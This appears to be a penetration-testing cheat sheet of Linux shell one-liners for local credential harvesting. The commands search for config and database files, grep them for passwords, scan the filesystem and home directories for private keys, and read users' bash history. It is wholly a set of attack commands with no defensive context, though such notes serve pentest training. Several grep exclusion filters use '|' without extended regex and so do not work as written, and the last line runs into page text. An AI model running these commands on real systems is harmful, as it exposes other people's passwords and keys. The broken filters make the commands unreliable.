Linux Local Password Attacks
# Find configuration files
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done
# Search for credentials in files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done
# Find common database files
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done
# Search for text files
find /home/* -type f -name "*.txt" -o ! -name "*.*"
# Search for private keys
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
# Extract last 5 lines from bash history
tail -n5 /home/*/.bash*Last updated